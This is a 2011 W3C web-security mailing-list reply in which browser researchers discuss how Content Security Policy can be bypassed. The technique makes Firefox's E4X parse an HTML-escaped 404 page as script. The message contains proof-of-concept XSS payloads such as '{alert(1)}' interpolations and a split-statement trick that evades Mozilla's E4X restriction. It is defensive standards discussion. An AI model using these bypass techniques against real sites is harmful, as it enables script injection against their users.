
Re: XSS mitigation in browsers

From: gaz Heyes <gazheyes@gmail.com>
Date: Thu, 20 Jan 2011 23:07:01 +0000
Message-ID: <AANLkTik6YY7AdXJ8mtk9SUYdbQOuGPtD7A-ULZvt9ySd@mail.gmail.com>
To: Michal Zalewski <lcamtuf@coredump.cx>
Cc: Brandon Sterne <bsterne@mozilla.com>, Adam Barth <w3c@adambarth.com>, public-web-security@w3.org, Sid Stamm <sid@mozilla.com>, Lucas Adamski <ladamski@mozilla.com>
On 20 January 2011 22:49, Michal Zalewski <lcamtuf@coredump.cx> wrote:

> Oh, and I noticed that CSP specifies allowable script locations on
> per-origin basis too.
> That would make it vulnerable to the two attacks I mentioned in my
> initial response to Adam, right?
> Specifically, consider that within any medium-complexity domain
> (mozilla.com, google.com, facebook.com), you can almost certainly
> discover a location that returns HTML-escaped attacker-supplied text
> in a context that would parse as valid JavaScript. This is easier than
> expected, particularly in browsers that support E4X, such as Firefox.
> If I have a 404 HTML page saying:
> <html><body>
> ...
> The page at $escaped_request_location cannot be found.
> ...
> </body>
> </html>
> ...and $request_location = "/some/path/{alert(1)}", then user-supplied
> script will execute. To test, try this in Firefox:
> javascript:void(<html>foo {alert(1)}</html>)

Yeah, this attack has been known for a while (2009), but using JSON files with E4X.

Mozilla decided (I think) to protect against this by preventing E4X
documents from being the "full program", but this is useless because we can
simply split the statement up. I love and hate E4X so much.
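
To make "split the statement up" concrete, here is a rough sketch (assuming
an E4X-capable Firefox, and reusing Michal's hypothetical 404 body). The
restriction only refuses a script whose entire source is a single XML
literal, so this on its own is rejected:

<html><body>The page at /some/path/{alert(1)} cannot be found.</body></html>

...but add any other statement and the XML literal is no longer the whole
program: it becomes an ordinary expression statement, the {alert(1)}
interpolation is evaluated while the literal is built, and the alert fires:

void 0; // any extra statement will do
<html><body>The page at /some/path/{alert(1)} cannot be found.</body></html>;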

